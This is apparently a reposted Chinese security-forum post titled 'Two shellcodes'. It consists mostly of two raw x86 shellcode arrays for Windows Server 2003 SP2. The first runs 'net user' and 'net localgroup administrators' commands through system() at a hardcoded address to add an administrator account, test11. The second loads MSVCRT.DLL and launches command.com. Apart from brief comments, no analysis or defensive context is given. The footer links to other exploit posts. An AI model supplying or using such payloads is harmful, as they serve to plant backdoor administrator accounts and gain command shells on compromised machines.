两个shellcode 's

2017年5月5日01:18:07评论287 views字数 2209阅读7分21秒阅读模式

摘要

文章作者：pt007[at]vip.sina.com
信息来源：邪恶八进制信息安全团队(www.eviloctal.com)

注：文章首发I.S.T.O信息安全团队，后由原创作者友情提交到邪恶八进制信息安全团队技术讨论组。I.S.T.O版权所有，转载需注明作者。
1、//win2003+sp2下加入一个test11/Test11!!!管理员用户的shellcode:
unsigned char shellcode[]=
“/x55/x8B/xEC/x33/xFF/x57/x83/xEC/x24”
“/xC6/x45/xDC/x6E/xC6/x45/xDD/x65/xC6/x45/xDE/x74/xC6/x45/xDF/x20/xC6/x45/xE0/x0D/xC6/x45/xE1/x75/xC6/x45/xE2/x73/xC6/x45/xE3/x65/xC6/x45/xE4/x72/xC6/x45/xE5/x20/xC6/x45/xE6/x0D/xC6/x45/xE7/x74/xC6/x45/xE8/x65/xC6/x45/xE9/x73/xC6/x45/xEA/x74/xC6/x45/xEB/x31/xC6/x45/xEC/x31/xC6/x45/xED/x20/xC6/x45/xEE/x0D/xC6/x45/xEF/x54/xC6/x45/xF0/x65/xC6/x45/xF1/x73/xC6/x45/xF2/x74/xC6/x45/xF3/x31/xC6/x45/xF4/x31/xC6/x45/xF5/x21/xC6/x45/xF6/x21/xC6/x45/xF7/x21/xC6/x45/xF8/x20/xC6/x45/xF9/x0D/xC6/x45/xFA/x2F/xC6/x45/xFB/x61/xC6/x45/xFC/x64/xC6/x45/xFD/x64/x8D/x45/xDC/x50/xB8/x83/xA0/xB8/x77/xFF/xD0”
“/x55/x8B/xEC/x33/xFF/x57/x83/xEC/x34”
“/xC6/x45/xCC/x6E/xC6/x45/xCD/x65/xC6/x45/xCE/x74/xC6/x45/xCF/x20/xC6/x45/xD0/x0D/xC6/x45/xD1/x6C/xC6/x45/xD2/x6F/xC6/x45/xD3/x63/xC6/x45/xD4/x61/xC6/x45/xD5/x6C/xC6/x45/xD6/x67/xC6/x45/xD7/x72/xC6/x45/xD8/x6F/xC6/x45/xD9/x75/xC6/x45/xDA/x70/xC6/x45/xDB/x20/xC6/x45/xDC/x0D/xC6/x45/xDD/x61/xC6/x45/xDE/x64/xC6/x45/xDF/x6D/xC6/x45/xE0/x69/xC6/x45/xE1/x6E/xC6/x45/xE2/x69/xC6/x45/xE3/x73/xC6/x45/xE4/x74/xC6/x45/xE5/x72/xC6/x45/xE6/x61/xC6/x45/xE7/x74/xC6/x45/xE8/x6F/xC6/x45/xE9/x72/xC6/x45/xEA/x73/xC6/x45/xEB/x20/xC6/x45/xEC/x0D/xC6/x45/xED/x74/xC6/x45/xEE/x65/xC6/x45/xEF/x73/xC6/x45/xF0/x74/xC6/x45/xF1/x31/xC6/x45/xF2/x31/xC6/x45/xF3/x20/xC6/x45/xF4/x0D/xC6/x45/xF5/x2F/xC6/x45/xF6/x61/xC6/x45/xF7/x64/xC6/x45/xF8/x64”
“/x8D/x45/xCC/x50/xB8/x83/xA0/xB8/x77/xFF/xD0”;

2、/* 以下shellcode将开启一个command.com for win2k3+sp2 */
“/x55/x8B/xEC/x33/xC0/x50/x50/x50/xC6/x45/xF4/x4D/xC6/x45/xF5/x53”
“/xC6/x45/xF6/x56/xC6/x45/xF7/x43/xC6/x45/xF8/x52/xC6/x45/xF9/x54/xC6/x45/xFA/x2E/xC6”
“/x45/xFB/x44/xC6/x45/xFC/x4C/xC6/x45/xFD/x4C/xBA”
“/xc6/x1d/x80/x7c” //2003 sp2上LoadLibraryA地址:0x7C801DC6
“/x52/x8D/x45/xF4/x50”
“/xFF/x55/xF0”
“/x55/x8B/xEC/x83/xEC/x2C/xB8/x63/x6F/x6D/x6D/x89/x45/xF4/xB8/x61/x6E/x64/x2E”
“/x89/x45/xF8/xB8/x63/x6F/x6D/x22/x89/x45/xFC/x33/xD2/x88/x55/xFF/x8D/x45/xF4”
“/x50/xB8”
“/x83/xa0/xb8/x77” //2003 sp1和sp2上system地址:0x77b8a083
“/xFF/xD0”;

左青龙
微信扫一扫

右白虎
微信扫一扫

两个shellcode 's

Discuz! 5.0.0 GBK SQL injection / admin credentials disclosure exploit

LBS 2.0.313 重要安全更新 [2007-07-03] 's

LBS blog又一注射漏洞含漏洞解析和exp 's

Penetration Testing 渗透测试 (11%) 's

bbsxp 2007[以前版本不知道]一个有意思的漏洞 's

bbsxp 2007斑竹权限注射 's

bbsxp 2007 注射漏洞 's

BBSXP7 mssql版，从注入到拿WEBSHELL 's

LBS 2.0.312 重要安全更新 [2007-06-29] 's

LBS blog sql注射漏洞[All version] 's

发表评论

在线咨询

微信